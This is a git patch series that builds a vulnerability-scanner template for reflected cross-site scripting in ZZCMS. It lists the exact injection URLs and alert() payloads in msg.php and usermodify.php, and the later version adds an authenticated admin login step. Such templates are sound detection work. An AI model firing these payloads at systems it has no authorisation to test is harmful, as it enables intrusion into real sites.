From 768aba3b0973afd473dedc063b0a3a5999c26fee Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sat, 16 Apr 2022 14:32:25 +0530 Subject: [PATCH 1/4] Create zzcms-xss.yaml --- vulnerabilities/other/zzcms-xss.yaml | 33 ++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 vulnerabilities/other/zzcms-xss.yaml diff --git a/vulnerabilities/other/zzcms-xss.yaml b/vulnerabilities/other/zzcms-xss.yaml new file mode 100644 index 0000000000..35d869cf44 --- /dev/null +++ b/vulnerabilities/other/zzcms-xss.yaml @@ -0,0 +1,33 @@ +id: zzcms-xss + +info: + name: ZZCMS XSS + author: ritikchaddha + severity: medium + reference: + - https://github.com/JcQSteven/blog/issues/20 + tags: zzcms,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/user/msg.php?action=modify&id=198445%22%2balert(233)%2b%221" + - "{{BaseURL}}/admin/usermodify.php?id=1%22%2balert(345)%2b%22" + + matchers-condition: or + matchers: + - type: word + words: + - "alert(233)" + part: body + condition: and + + - type: word + words: + - "alert(345)" + part: body + condition: and + + - type: status + status: + - 200 From 406f8fab71222eb33213329377f87d5ac86759fd Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 18 Apr 2022 02:37:25 +0400 Subject: [PATCH 2/4] Update zzcms-xss.yaml --- vulnerabilities/other/zzcms-xss.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/zzcms-xss.yaml b/vulnerabilities/other/zzcms-xss.yaml index 35d869cf44..7530ac734d 100644 --- a/vulnerabilities/other/zzcms-xss.yaml +++ b/vulnerabilities/other/zzcms-xss.yaml @@ -14,6 +14,7 @@ requests: - "{{BaseURL}}/user/msg.php?action=modify&id=198445%22%2balert(233)%2b%221" - "{{BaseURL}}/admin/usermodify.php?id=1%22%2balert(345)%2b%22" + stop-at-first-match: true matchers-condition: or matchers: - type: word From 8c6cc9b9ebd30e8eb0c201225b0ab5e9772c4ebc Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sun, 24 Jul 2022 19:13:49 +0530 Subject: [PATCH 3/4] Update zzcms-xss.yaml --- vulnerabilities/other/zzcms-xss.yaml | 44 ++++++++++++++-------------- 1 file changed, 22 insertions(+), 22 deletions(-) diff --git a/vulnerabilities/other/zzcms-xss.yaml b/vulnerabilities/other/zzcms-xss.yaml index 7530ac734d..304ddbde7b 100644 --- a/vulnerabilities/other/zzcms-xss.yaml +++ b/vulnerabilities/other/zzcms-xss.yaml @@ -1,34 +1,34 @@ id: zzcms-xss info: - name: ZZCMS XSS + name: ZZCMS2019 - Cross-Site Scripting author: ritikchaddha severity: medium reference: - https://github.com/JcQSteven/blog/issues/20 - tags: zzcms,xss + metadata: + verified: true + tags: zzcms,xss,authenticated requests: - - method: GET - path: - - "{{BaseURL}}/user/msg.php?action=modify&id=198445%22%2balert(233)%2b%221" - - "{{BaseURL}}/admin/usermodify.php?id=1%22%2balert(345)%2b%22" + - raw: + - | + POST /admin/logincheck.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded - stop-at-first-match: true - matchers-condition: or + admin={{username}}&pass={{password}} + + - | + GET /admin/usermodify.php?id=1%22%2balert(document.domain)%2b%22 HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + req-condition: true matchers: - - type: word - words: - - "alert(233)" - part: body + - type: dsl + dsl: + - "contains(all_headers_2, 'text/html')" + - "status_code_2 == 200" + - 'contains(body_2, "参数 1\"+alert(document.domain)+")' condition: and - - - type: word - words: - - "alert(345)" - part: body - condition: and - - - type: status - status: - - 200 From ac96218aae3450e2b1435214ecd79131f9933333 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 24 Jul 2022 21:16:05 +0530 Subject: [PATCH 4/4] Update zzcms-xss.yaml --- vulnerabilities/other/zzcms-xss.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/zzcms-xss.yaml b/vulnerabilities/other/zzcms-xss.yaml index 304ddbde7b..c6ae32d33b 100644 --- a/vulnerabilities/other/zzcms-xss.yaml +++ b/vulnerabilities/other/zzcms-xss.yaml @@ -1,7 +1,7 @@ id: zzcms-xss info: - name: ZZCMS2019 - Cross-Site Scripting + name: ZZCMS - Cross-Site Scripting author: ritikchaddha severity: medium reference: